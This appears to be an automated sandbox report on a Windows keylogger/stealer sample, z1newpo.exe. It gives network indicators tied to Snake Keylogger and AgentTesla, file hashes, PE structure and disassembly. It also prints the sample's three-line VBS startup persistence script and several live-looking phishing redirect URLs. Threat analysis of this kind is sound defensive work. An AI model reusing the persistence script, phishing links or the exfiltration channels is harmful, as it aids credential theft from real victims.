• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
• VT rate limit hit for: z1newpo.exe
Time | Type | Description
09:26:03 | API Interceptor | 16264085x Sleep call for process: RegSvcs.exe modified
15:26:04 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs
Match | Associated Sample Name / URL | Detection | Threat Name | Context
132.226.8.169 | rNEWPURCHASEORDER094637.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
 | QUOTATION_SEPQTRA071244PDF.scr.exe | malicious | Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
 | Hesaphareketi-01.exe | malicious | Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
 | Dekont_20240917_38847738373.exe | malicious | Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
 | TVY67438038-GH93GHDBHSJUJS-PLS7838WU0.exe | malicious | Snake Keylogger | checkip.dyndns.org/
 | Quotation QT-433.scr.exe | malicious | Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
 | M.V CHARIKLIA JUNIOR - PARTICULARS.docx.scr.exe | malicious | Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
 | CHARIKLIA JUNIOR - PARTICULARS.docx.scr.exe | malicious | Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
 | PO#005.exe | malicious | Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
 | ENQUIRY FOR QUOTATION REF.NO-2009008766.exe | malicious | Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
208.91.198.143 | z68ORDER.scr.exe | malicious | AgentTesla |
 | z17invoice.exe | malicious | AgentTesla |
 | z47maaaaaaaaaaaaax.exe | malicious | AgentTesla |
 | SecuriteInfo.com.PDF.Phishing.7B6B.tr.8047.20915.xlsx | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger |
 | product_list.xls | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger |
 | SecuriteInfo.com.Other.Malware-gen.12504.4949.xlsx | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger |
 | giehjhgjzJ.hta | malicious | Cobalt Strike, MassLogger RAT, Snake Keylogger |
 | NGL1Of0ZkJ.hta | malicious | Cobalt Strike, AgentTesla |
 | SecuriteInfo.com.Win32.PWSX-gen.19673.26192.exe | malicious | AgentTesla |
 | Edsha_PO.xls | malicious | AgentTesla |
Match | Associated Sample Name / URL | Detection | Threat Name | Context
us2.smtp.mailhostbox.com | Invoice Payment.exe | malicious | Snake Keylogger, VIP Keylogger | 208.91.199.224
 | z47TTSWIFTCOPY.scr.exe | malicious | AgentTesla | 208.91.199.223
 | Invoice Request.scr.exe | malicious | AgentTesla | 208.91.199.224
 | SecuriteInfo.com.Trojan.PackedNET.3050.5454.27030.exe | malicious | Snake Keylogger, VIP Keylogger | 208.91.199.225
 | z68ORDER.scr.exe | malicious | AgentTesla | 208.91.198.143
 | SecuriteInfo.com.Win32.PWSX-gen.12778.1808.exe | malicious | Snake Keylogger, VIP Keylogger | 208.91.199.225
 | EXmRyGiPUc.exe | malicious | AgentTesla | 208.91.199.223
 | z17invoice.exe | malicious | AgentTesla | 208.91.198.143
 | love.exe | malicious | AgentTesla | 208.91.199.225
 | z47maaaaaaaaaaaaax.exe | malicious | AgentTesla | 208.91.198.143
reallyfreegeoip.org | rNEWPURCHASEORDER094637.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 188.114.97.3
 | MT LADY YASSO VESSEL BRIEF DETAILS.exe | malicious | Snake Keylogger | 188.114.96.3
 | IMG_1507_1603.exe | malicious | Snake Keylogger | 188.114.96.3
 | MT103 SWIFT COPY.exe | malicious | DarkTortilla, Snake Keylogger | 188.114.96.3
 | SWIFT.exe | malicious | GuLoader, Snake Keylogger | 188.114.96.3
 | QUOTATION_SEPQTRA071244PDF.scr.exe | malicious | Snake Keylogger | 188.114.97.3
 | QUOTATION_SEPQTRA071244PDF.scr.exe | malicious | Snake Keylogger | 188.114.96.3
 | QUOTATION_SEPQTRA071244PDF.scr.exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.96.3
 | Quotation 47923.exe | malicious | Snake Keylogger, VIP Keylogger, XRed | 188.114.96.3
 | QUOTATION_SEPQTRA071244PDF.scr.exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.97.3
api.telegram.org | rNEWPURCHASEORDER094637.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 149.154.167.220
 | Order #SS1953pdf.exe | malicious | AgentTesla | 149.154.167.220
 | SWIFT.exe | malicious | GuLoader, Snake Keylogger | 149.154.167.220
 | QUOTATION_SEPQTRA071244PDF.scr.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
 | Quotation 47923.exe | malicious | Snake Keylogger, VIP Keylogger, XRed | 149.154.167.220
 | QUOTATION_SEPQTRA071244PDF.scr.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
 | PO000002519 - Request for details.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
 | Hesaphareketi-01.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
 | Dekont_20240917_38847738373.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
 | NzEsfIiAc0.exe | malicious | XWorm | 149.154.167.220
checkip.dyndns.com | rNEWPURCHASEORDER094637.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 132.226.8.169
 | MT LADY YASSO VESSEL BRIEF DETAILS.exe | malicious | Snake Keylogger | 193.122.130.0
 | IMG_1507_1603.exe | malicious | Snake Keylogger | 158.101.44.242
 | MT103 SWIFT COPY.exe | malicious | DarkTortilla, Snake Keylogger | 158.101.44.242
 | SWIFT.exe | malicious | GuLoader, Snake Keylogger | 193.122.130.0
 | QUOTATION_SEPQTRA071244PDF.scr.exe | malicious | Snake Keylogger | 193.122.130.0
 | QUOTATION_SEPQTRA071244PDF.scr.exe | malicious | Snake Keylogger | 132.226.247.73
 | QUOTATION_SEPQTRA071244PDF.scr.exe | malicious | Snake Keylogger, VIP Keylogger | 158.101.44.242
 | Quotation 47923.exe | malicious | Snake Keylogger, VIP Keylogger, XRed | 132.226.247.73
 | QUOTATION_SEPQTRA071244PDF.scr.exe | malicious | Snake Keylogger, VIP Keylogger | 132.226.8.169
                                                  Match | Associated Sample Name / URL | Detection | Threat Name | Context
                                                  TELEGRAMRU | rNEWPURCHASEORDER094637.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 149.154.167.220
                                                  TELEGRAMRU | file.exe | malicious | LummaC, PureLog Stealer, RedLine, Socks5Systemz, Stealc, Vidar, Xmrig | 149.154.167.99
                                                  TELEGRAMRU | file.exe | malicious | LummaC, Vidar | 149.154.167.99
                                                  TELEGRAMRU | file.exe | malicious | LummaC, Vidar | 149.154.167.99
                                                  TELEGRAMRU | file.exe | malicious | LummaC, Vidar | 149.154.167.99
                                                  TELEGRAMRU | file.exe | malicious | LummaC, Stealc, Vidar | 149.154.167.99
                                                  TELEGRAMRU | file.exe | malicious | LummaC, Vidar | 149.154.167.99
                                                  TELEGRAMRU | Order #SS1953pdf.exe | malicious | AgentTesla | 149.154.167.220
                                                  TELEGRAMRU | SWIFT.exe | malicious | GuLoader, Snake Keylogger | 149.154.167.220
                                                  TELEGRAMRU | QUOTATION_SEPQTRA071244PDF.scr.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
                                                  PUBLIC-DOMAIN-REGISTRYUS | Quote 20240533-REV2.exe | malicious | AgentTesla, PureLog Stealer | 199.79.62.115
                                                  PUBLIC-DOMAIN-REGISTRYUS | Invoice Payment.exe | malicious | Snake Keylogger, VIP Keylogger | 208.91.199.224
                                                  PUBLIC-DOMAIN-REGISTRYUS | https://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%E2%80%8Bp%C2%ADri%C2%ADvi%C2%ADl%C3%A8%C2%ADge%C2%ADt%C2%ADv.%E2%80%8Bf%C2%ADr%2Fddd%2Fopc%2FESwvA1jmTcm6YlLT8cDALmb3/cGxvdHRlYm9yZC5ub0Bwb3N0bm9yZC5jb20= | malicious | Unknown | 116.206.104.99
                                                  PUBLIC-DOMAIN-REGISTRYUS | Shipping documents.exe | malicious | AgentTesla | 162.251.85.202
                                                  PUBLIC-DOMAIN-REGISTRYUS | PO- 220135.exe | malicious | AgentTesla, PureLog Stealer | 199.79.62.115
                                                  PUBLIC-DOMAIN-REGISTRYUS | z47TTSWIFTCOPY.scr.exe | malicious | AgentTesla | 208.91.199.223
                                                  PUBLIC-DOMAIN-REGISTRYUS | https://www.google.com/url?q=https://www.google.com/url?q%3D6svi1oMcTV0NeHiFXfMT%26rct%3DymEXS3GcN1kzd29f90Jh%26sa%3Dt%26esrc%3DMKuZSwa3VscPTAKnZxUY%26source%3D%26cd%3DmuCyjHwItCeuxIlcZYQK%26cad%3DwIPICxxR6hM2MjAzQktg%26ved%3DfkNU1q9O08RLJIKTIJOT%26uact%3D%2520%26url%3Damp%252Fjaldirummy%252Ecom%252F.rice%252F&source=gmail&ust=1726134371821000&usg=AOvVaw3eh4rUjLydKAIWROEb78Zn#9K9BYE-SUREBOOTbWljaGFlbHNjb2ZpZWxkQGRpc25leS5jb20= | malicious | HTMLPhisher | 204.11.58.94
                                                  PUBLIC-DOMAIN-REGISTRYUS | Quote_4400201477.exe | malicious | AgentTesla, PureLog Stealer | 199.79.62.115
                                                  PUBLIC-DOMAIN-REGISTRYUS | Shipping doc.exe | malicious | AgentTesla | 162.251.85.202
                                                  PUBLIC-DOMAIN-REGISTRYUS | https://go.skimresources.com/?id=129857X1500501&url=https://www.freelansssssssssssssssscer.com/users/login-quick.php?token=30b3628412ea618dcc3f414b266ae263302b3e1b43e6d2d885225319dabe8e68&url=https://secure.adnxs.com/seg?redir=https://link.sbstck.com/redirect/45834840-3c14-4374-8f51-bbcadebab762?j=eyJ1IjoiNGRnZ2x2In0 | malicious | HTMLPhisher | 103.53.40.62
                                                  UTMEMUS | rNEWPURCHASEORDER094637.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 132.226.8.169
                                                  UTMEMUS | QUOTATION_SEPQTRA071244PDF.scr.exe | malicious | Snake Keylogger | 132.226.247.73
                                                  UTMEMUS | Quotation 47923.exe | malicious | Snake Keylogger, VIP Keylogger, XRed | 132.226.247.73
                                                  UTMEMUS | QUOTATION_SEPQTRA071244PDF.scr.exe | malicious | Snake Keylogger, VIP Keylogger | 132.226.8.169
                                                  UTMEMUS | Hesaphareketi-01.exe | malicious | Snake Keylogger, VIP Keylogger | 132.226.8.169
                                                  UTMEMUS | Dekont_20240917_38847738373.exe | malicious | Snake Keylogger, VIP Keylogger | 132.226.8.169
                                                  UTMEMUS | ship particulars_M.V FAROUK M.pdf.scr.exe | malicious | Snake Keylogger, VIP Keylogger | 132.226.247.73
                                                  UTMEMUS | TVY67438038-GH93GHDBHSJUJS-PLS7838WU0.exe | malicious | Snake Keylogger | 132.226.8.169
                                                  UTMEMUS | hesaphareketi-01_pdf.exe | malicious | Snake Keylogger, VIP Keylogger | 132.226.247.73
                                                  UTMEMUS | Quotation QT-433.scr.exe | malicious | Snake Keylogger, VIP Keylogger | 132.226.8.169
                                                  CLOUDFLARENETUS | rNEWPURCHASEORDER094637.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 188.114.97.3
                                                  CLOUDFLARENETUS | https://demo.services.docusign.net/webforms-ux/v1.0/forms/10bc61c9dc8dd4ea79884f1c0703f644 | malicious | HTMLPhisher | 104.17.25.14
                                                  CLOUDFLARENETUS | https://immergut.dotling.com | malicious | Unknown | 188.114.96.3
                                                  CLOUDFLARENETUS | 18092024 PDF.exe | malicious | AgentTesla | 104.26.12.205
                                                  CLOUDFLARENETUS | 2723912 PDF.exe | malicious | AgentTesla | 172.67.74.152
                                                  CLOUDFLARENETUS | MV ALIADO - S-REQ-19-00064.exe | malicious | AgentTesla, PureLog Stealer | 104.26.13.205
                                                  CLOUDFLARENETUS | https://abena.dotling.com/ | malicious | Unknown | 188.114.96.3
                                                  CLOUDFLARENETUS | file.exe | malicious | LummaC, PureLog Stealer, RedLine, Socks5Systemz, Stealc, Vidar, Xmrig | 104.26.3.46
                                                  CLOUDFLARENETUS | https://traininngllc.zendesk.com | malicious | Unknown | 104.18.70.113
                                                  CLOUDFLARENETUS | https://www.google.com/url?q=https://www.google.com/url?q=https://www.google.com/url?q=https://www.google.com/url?q=https://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wD6jzGRyycT&sa=t&esrc=6jzGRFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ1GcDqhlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Fanoboy.pw%2Fojo%2Flok%2F9198595720/#a2FybC5ib25uZXJAYXR1Lmll=$%E3%80%82 | malicious | EvilProxy, HTMLPhisher | 104.26.13.205
                                                  Match | Associated Sample Name / URL | Detection | Threat Name | Context
                                                  54328bd36c14bd82ddaa0c04b25ed9ad | rNEWPURCHASEORDER094637.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 188.114.96.3
                                                  54328bd36c14bd82ddaa0c04b25ed9ad | DbwdFVTAXI.exe | malicious | PXRECVOWEIWOEI Stealer | 188.114.96.3
                                                  54328bd36c14bd82ddaa0c04b25ed9ad | 4b8lIXw22G.exe | malicious | PXRECVOWEIWOEI Stealer | 188.114.96.3
                                                  54328bd36c14bd82ddaa0c04b25ed9ad | HONG_KONG_CHEMHERE_QUOTE_REQUEST.vbs | malicious | PXRECVOWEIWOEI Stealer, PureLog Stealer | 188.114.96.3
                                                  54328bd36c14bd82ddaa0c04b25ed9ad | MT LADY YASSO VESSEL BRIEF DETAILS.exe | malicious | Snake Keylogger | 188.114.96.3
                                                  54328bd36c14bd82ddaa0c04b25ed9ad | IMG_1507_1603.exe | malicious | Snake Keylogger | 188.114.96.3
                                                  54328bd36c14bd82ddaa0c04b25ed9ad | MT103 SWIFT COPY.exe | malicious | DarkTortilla, Snake Keylogger | 188.114.96.3
                                                  54328bd36c14bd82ddaa0c04b25ed9ad | SWIFT.exe | malicious | GuLoader, Snake Keylogger | 188.114.96.3
                                                  54328bd36c14bd82ddaa0c04b25ed9ad | QUOTATION_SEPQTRA071244PDF.scr.exe | malicious | Snake Keylogger | 188.114.96.3
                                                  54328bd36c14bd82ddaa0c04b25ed9ad | QUOTATION_SEPQTRA071244PDF.scr.exe | malicious | Snake Keylogger | 188.114.96.3
                                                  3b5074b1b5d032e5620f69f9f700ff0e | rNEWPURCHASEORDER094637.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 149.154.167.220
                                                  3b5074b1b5d032e5620f69f9f700ff0e | 18092024 PDF.exe | malicious | AgentTesla | 149.154.167.220
                                                  3b5074b1b5d032e5620f69f9f700ff0e | 2723912 PDF.exe | malicious | AgentTesla | 149.154.167.220
                                                  3b5074b1b5d032e5620f69f9f700ff0e | MV ALIADO - S-REQ-19-00064.exe | malicious | AgentTesla, PureLog Stealer | 149.154.167.220
                                                  3b5074b1b5d032e5620f69f9f700ff0e | DbwdFVTAXI.exe | malicious | PXRECVOWEIWOEI Stealer | 149.154.167.220
                                                  3b5074b1b5d032e5620f69f9f700ff0e | 4b8lIXw22G.exe | malicious | PXRECVOWEIWOEI Stealer | 149.154.167.220
                                                  3b5074b1b5d032e5620f69f9f700ff0e | HONG_KONG_CHEMHERE_QUOTE_REQUEST.vbs | malicious | PXRECVOWEIWOEI Stealer, PureLog Stealer | 149.154.167.220
                                                  3b5074b1b5d032e5620f69f9f700ff0e | Data-Sheet.js | malicious | Unknown | 149.154.167.220
                                                  3b5074b1b5d032e5620f69f9f700ff0e | Enquiry.js | malicious | Unknown | 149.154.167.220
                                                  3b5074b1b5d032e5620f69f9f700ff0e | Order.js | malicious | AgentTesla | 149.154.167.220
                                                  No context
                                                  Process:C:\Users\user\Desktop\z1newpo.exe
                                                  File Type:data
                                                  Category:modified
                                                  Size (bytes):274432
                                                  Entropy (8bit):6.987696140164473
                                                  Encrypted:false
                                                  SSDEEP:6144:b6vq4FoG8WsShEulx8ohmxvuaYNVyMoNb72xhpBB2hogzoeCemvYewk2ogxmILyf:byq4FoGp8ohmxvuaAVnoNb72xhH4fEdL
                                                  MD5:231C98E12D2FD3D615E010A5E705DECA
                                                  SHA1:5C857C3078CF417B86B7FE2498B5C73AAAD411A9
                                                  SHA-256:92D141B7CF3C48E02FC330AAC81709DD52067B297F24A7449810B7636FE44F2F
                                                  SHA-512:BC010B4E21B7430CCCDF3D7E915DD9FBF9C97C7B302D83C673B2EE616DE93863A63C156A1BB3D8DD363846822087E4FE4D5FE37BE7C777BCFA5C0D14C551055F
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview:~m.Q56151OFY..8H.28OIS37yQ66155OFYRP8HL28OIS379Q66155OFYRP8H.28OGL.99.?...4..x.8Q;lBJ .!RZ.2WX_ZAo$<r"M&l[Vo..`.T>RS.88EbYRP8HL2h.IS.6:Q.S5OFYRP8H.2:NBRc79K261!5OFYRP6qH28oIS3w=Q66q55oFYRR8HH28OIS37=Q66155OF.VP8JL28OIS17y.66!55_FYRP(HL"8OIS37)Q66155OFYRP.pH2sOIS3w=Q!&155OFYRP8HL28OIS379126=55OFYRP8HL28OIS379Q66155OFYRP8HL28OIS379Q66155OFYRP8hL20OIS379Q6615=oFY.P8HL28OIS37.%SNE55OR@VP8hL28UMS359Q66155OFYRP8Hl28/g!@EZQ66&%5OF.VP8ZL28SMS379Q66155OFY.P8.b@]#&0375Q661U1OF[RP8fH28OIS379Q6615uOF.RP8HL28OIS379Q66..1OFYRPpHL2:OLS[.;Qn.056OFY.P8N..:O.S379Q66155OFYRP8HL28OIS379Q66155OFYRP8HL28O...8..._B..OFYRP8IN1<IA[379Q6615KOFY.P8H.28O~S37.Q66\55ObYRPFHL2FOISW79QD615TOFY.P8H#28O'S37GQ66/7.oFYXz.HN..OIY3..".61?.NFYV#.HL8.MIS7D.Q6<.65OB*wP8B.68OM .79[.3151e.YQ..NL2# pS3=9R.#755Tl.RR.rL22Ocu34.D061..mF[.Y8HH.n<TS31..66;A<OF[.Z8HH.&Ma.373{.H:55KmYxrFDL2<dIy.I4Q62.5.QD._P8Lf.FAIS7.9{.H>55KmYxN:.C28KcqM'9Q2.1..1WYRT.Hf.F]IS7.9{.H"55KmYxrF\L2<dIy.I,Q62.5.m8ORP<cL..1^S33.Q..O-5OBrRz&J.*8OMy5.[QD<'5EL
                                                  Process:C:\Users\user\Desktop\z1newpo.exe
                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                  Category:modified
                                                  Size (bytes):1342755
                                                  Entropy (8bit):7.442815577239056
                                                  Encrypted:false
                                                  SSDEEP:24576:pRmJkcoQricOIQxiZY1iaJ0eud6LfL5vSjUBMF94Z9M5:mJZoQrbTFZY1iaJ0eudejk+k9eC
                                                  MD5:C087116B5A47A54E5DD272162FD87B3B
                                                  SHA1:71EB7A31ED81367C95563F6D4AADFB6EA028B997
                                                  SHA-256:5988BA6BF97C1B33F469EDFCA96B98C35D2054F2CE49D8E065D23250A241A3D0
                                                  SHA-512:FECDFC372CCEBE22830E31A8D20050CA7A3E1B87ED1A0876DF471D20AEDAC1E3283AF624B470A20EF024F6283583629A44716197F341DCC263504DE4D19E01C4
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 74%
                                                  Reputation:low
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................1b.....P.)....Q.....y.....i.......}...N......d.....`.....m.....g....Rich............PE..L....%O..........#..................e....... ....@...........................................@.......@.........................T.......x7........................................................................... ..D............................text............................... ..`.rdata....... ......................@..@.data...X........h..................@....rsrc...x7.......8...T..............@..@........................................................................................................................................................................................................................................................................................................................................................
                                                  Process:C:\Users\user\AppData\Local\directory\name.exe
                                                  File Type:data
                                                  Category:modified
                                                  Size (bytes):276
                                                  Entropy (8bit):3.4438563990029807
                                                  Encrypted:false
                                                  SSDEEP:6:DMM8lfm3OOQdUfclMMlW8g1UEZ+lX1Al1AE6nriIM8lfQVn:DsO+vNlMkXg1Q1A1z4mA2n
                                                  MD5:B4D89AA38733FBDC71944ABFA68E1E38
                                                  SHA1:33AF98BF7F8FD0F07732B44A661CBE717C314ACE
                                                  SHA-256:16E4EEB3145927B0A84AC5DA4FDC83A98D9F023BDDE346AD62035A5E633201E1
                                                  SHA-512:E8E7BACE9C5988D89FD7BF4DA6ECBBEC81A3CB4A5402F008FA6FC03C0992E68CB5ADCB19F55AC1625E9E75E9EBCE95C1573CAE3F612700181A8255F2FA7AD9B3
                                                  Malicious:true
                                                  Reputation:moderate, very likely benign file
                                                  Preview (UTF-16LE text, decoded):Set WshShell = CreateObject("WScript.Shell")
                                                  WshShell.Run "C:\Users\frontdesk\AppData\Local\directory\name.exe", 1
                                                  Set WshShell = Nothing
                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                  Entropy (8bit):7.442815577239056
                                                  TrID:
                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                  • DOS Executable Generic (2002/1) 0.02%
                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                  File name:z1newpo.exe
                                                  File size:1'342'755 bytes
                                                  MD5:c087116b5a47a54e5dd272162fd87b3b
                                                  SHA1:71eb7a31ed81367c95563f6d4aadfb6ea028b997
                                                  SHA256:5988ba6bf97c1b33f469edfca96b98c35d2054f2ce49d8e065d23250a241a3d0
                                                  SHA512:fecdfc372ccebe22830e31a8d20050ca7a3e1b87ed1a0876df471d20aedac1e3283af624b470a20ef024f6283583629a44716197f341dcc263504de4d19e01c4
                                                  SSDEEP:24576:pRmJkcoQricOIQxiZY1iaJ0eud6LfL5vSjUBMF94Z9M5:mJZoQrbTFZY1iaJ0eudejk+k9eC
                                                  TLSH:6555D021A5D290F1D1E22EB19D7AF355BA6A6D250222C19FE3C439F00A73780D7297F7
                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................1b.......P.).....Q.......y.......i..........}....N.......d.......`.......m.......g.....Rich............PE..L..
                                                  Icon Hash:cf818c848c8a814f
                                                  Entrypoint:0x4165c1
                                                  Entrypoint Section:.text
                                                  Digitally signed:false
                                                  Imagebase:0x400000
                                                  Subsystem:windows gui
                                                  Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                  DLL Characteristics:TERMINAL_SERVER_AWARE
                                                  Time Stamp:0x4F25BAEC [Sun Jan 29 21:32:28 2012 UTC]
                                                  TLS Callbacks:
                                                  CLR (.Net) Version:
                                                  OS Version Major:5
                                                  OS Version Minor:0
                                                  File Version Major:5
                                                  File Version Minor:0
                                                  Subsystem Version Major:5
                                                  Subsystem Version Minor:0
                                                  Import Hash:d3bf8a7746a8d1ee8f6e5960c3f69378
                                                  Instruction
                                                  call 00007FF1D4E663CBh
                                                  jmp 00007FF1D4E5D23Eh
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  push ebp
                                                  mov ebp, esp
                                                  push edi
                                                  push esi
                                                  mov esi, dword ptr [ebp+0Ch]
                                                  mov ecx, dword ptr [ebp+10h]
                                                  mov edi, dword ptr [ebp+08h]
                                                  mov eax, ecx
                                                  mov edx, ecx
                                                  add eax, esi
                                                  cmp edi, esi
                                                  jbe 00007FF1D4E5D3BAh
                                                  cmp edi, eax
                                                  jc 00007FF1D4E5D556h
                                                  cmp ecx, 00000080h
                                                  jc 00007FF1D4E5D3CEh
                                                  cmp dword ptr [004A9724h], 00000000h
                                                  je 00007FF1D4E5D3C5h
                                                  push edi
                                                  push esi
                                                  and edi, 0Fh
                                                  and esi, 0Fh
                                                  cmp edi, esi
                                                  pop esi
                                                  pop edi
                                                  jne 00007FF1D4E5D3B7h
                                                  jmp 00007FF1D4E5D792h
                                                  test edi, 00000003h
                                                  jne 00007FF1D4E5D3C6h
                                                  shr ecx, 02h
                                                  and edx, 03h
                                                  cmp ecx, 08h
                                                  jc 00007FF1D4E5D3DBh
                                                  rep movsd
                                                  jmp dword ptr [00416740h+edx*4]
                                                  mov eax, edi
                                                  mov edx, 00000003h
                                                  sub ecx, 04h
                                                  jc 00007FF1D4E5D3BEh
                                                  and eax, 03h
                                                  add ecx, eax
                                                  jmp dword ptr [00416654h+eax*4]
                                                  jmp dword ptr [00416750h+ecx*4]
                                                  nop
                                                  jmp dword ptr [004166D4h+ecx*4]
                                                  nop
                                                  inc cx
                                                  add byte ptr [eax-4BFFBE9Ah], dl
                                                  inc cx
                                                  add byte ptr [ebx], ah
                                                  ror dword ptr [edx-75F877FAh], 1
                                                  inc esi
                                                  add dword ptr [eax+468A0147h], ecx
                                                  add al, cl
                                                  jmp 00007FF1D72D5BB7h
                                                  add esi, 03h
                                                  add edi, 03h
                                                  cmp ecx, 08h
                                                  jc 00007FF1D4E5D37Eh
                                                  rep movsd
                                                  jmp dword ptr [00000000h+edx*4]
                                                  Programming Language:
                                                  • [ C ] VS2010 SP1 build 40219
                                                  • [C++] VS2010 SP1 build 40219
                                                  • [ C ] VS2008 SP1 build 30729
                                                  • [IMP] VS2008 SP1 build 30729
                                                  • [ASM] VS2010 SP1 build 40219
                                                  • [RES] VS2010 SP1 build 40219
                                                  • [LNK] VS2010 SP1 build 40219
                                                  Name | Virtual Address | Virtual Size | Is in Section
                                                  IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                  IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8d41c | 0x154 | .rdata
                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xab000 | 0x13778 | .rsrc
                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                  IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                                                  IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                  IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                  IMAGE_DIRECTORY_ENTRY_IAT | 0x82000 | 0x844 | .rdata
                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                                  IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                                  Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                  .text | 0x1000 | 0x8061c | 0x80800 | 61ffce4768976fa0dd2a8f6a97b1417a | False | 0.5583182605787937 | data | 6.684690148171278 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                  .rdata | 0x82000 | 0xdfc0 | 0xe000 | 0354bc5f2376b5e9a4a3ba38b682dff1 | False | 0.36085728236607145 | data | 4.799741132252136 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                  .data | 0x90000 | 0x1a758 | 0x6800 | 8033f5a38941b4685bc2299e78f31221 | False | 0.15324519230769232 | data | 2.1500715391677487 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                  .rsrc | 0xab000 | 0x13778 | 0x13800 | deaf8cf0ab1ab56c5b616d6567464a39 | False | 0.08774038461538461 | data | 3.8891256142087705 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                  Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                                  RT_ICON | 0xab448 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
                                                  RT_ICON | 0xab570 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
                                                  RT_ICON | 0xab698 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
                                                  RT_ICON | 0xab7c0 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 67584 | English | Great Britain | 0.05220040222406246
                                                  RT_MENU | 0xbbfe8 | 0x50 | data | English | Great Britain | 0.9
                                                  RT_DIALOG | 0xbc038 | 0xfc | data | English | Great Britain | 0.6507936507936508
                                                  RT_STRING | 0xbc138 | 0x530 | data | English | Great Britain | 0.33960843373493976
